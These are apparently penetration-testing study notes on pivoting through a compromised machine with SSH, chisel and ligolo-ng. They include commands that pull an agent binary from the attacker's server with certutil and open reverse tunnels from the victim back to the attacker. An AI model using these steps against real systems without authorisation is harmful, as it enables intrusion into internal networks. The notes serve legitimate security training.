Port Forwarding

SSH

  • Method 1:

On Kali machine:
 sudo systemctl start ssh
 nano /etc/proxychains.conf
  # Append socks5 127.0.0.1 <port>
  # Append proxychains infront of any command targeted at the internal network moving forward

On Victim machine:
 ssh -N -R <port> kali@192.168.45.x

  • Method 2:

ssh <user>@<IP> -L <port>:127.0.0.1:<port>
 # Target 127.0.0.1:<port> to access the target machine's "hidden" port

Chisel

LogoGitHub - jpillora/chisel: A fast TCP/UDP tunnel over HTTPGitHub
On Kali machine:
    ./chisel_linux server -p 8001 --reverse


On Pivot machine:
    .\chisel.exe client <Kali IP>:8001 R:3306:<Target IP>:3306
    
    OR

    .\chisel.exe client <Kali IP>:8001 R:socks

Ligolo-ng

  1. Set up ligolo

LogoGitHub - nicocha30/ligolo-ng: An advanced, yet simple, tunneling/pivoting tool that uses a TUN interface.GitHub
On Kali Machine:
    sudo ip tuntap add user kali mode tun ligolo
    sudo ip link set ligolo up
    sudo ip route add <Internal net>/24 dev ligolo

    mkidr ligolo && cd ligolo
    
    mkdir proxy && cd proxy
    wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.7.5/ligolo-ng_proxy_0.7.5_linux_amd64.tar.gz
    tar -xf ligolo-ng_proxy_0.7.5_linux_amd64.tar.gz && rm ligolo-ng_proxy_0.7.5_linux_amd64.tar.gz
    
    cd ..
    
    mkdir ../agents && cd ../agents
    mkdir windows && cd windows
    wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.7.5/ligolo-ng_agent_0.7.5_windows_amd64.zip
    unzip ligolo-ng_agent_0.7.5_windows_amd64.zip && rm ligolo-ng_agent_0.7.5_windows_amd64.zip
    
    cd ..
    
    mkdir linux && cd linux
    wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.7.5/ligolo-ng_agent_0.7.5_linux_amd64.tar.gz
    tar -xf ligolo-ng_agent_0.7.5_linux_amd64.tar.gz && rm ligolo-ng_agent_0.7.5_linux_amd64.tar.gz
    
    cd ..
    
    python3 -m http.server 80 

On MS01:
    certutil -urlcache -split -f http://192.168.45.200/<platform>/agent.exe

  1. Initiate tunnel

On Kali Machine (~\ligolo\proxy):
    ./proxy -selfcert
    # Take note of the port this service starts on

On MS01:
    agent.exe -connect <kali IP>:<ligolo service port> -ignore-cert
        # Default port is: 11601
    
Once Agent joins the Server, Return to Kali terminal:
    session
    <enter>
    ifconfig # Verify interfaces of agent
    start # Creates a tunnel that allows our kali to access the internal network
    
    # Add listeners based on what you want the internal network to reach you for, then they will connect to the pivot machine via specified port
    listener_add --addr 0.0.0.0:<pivot port> --to <destination IP>:<destination port> 
    listener_list # Verify listener added

  • Now you can reach the internal network directly like is just part of your network

  • Just that the internal machines are talking to your proxy (pivot point) instead of directly to you

Last updated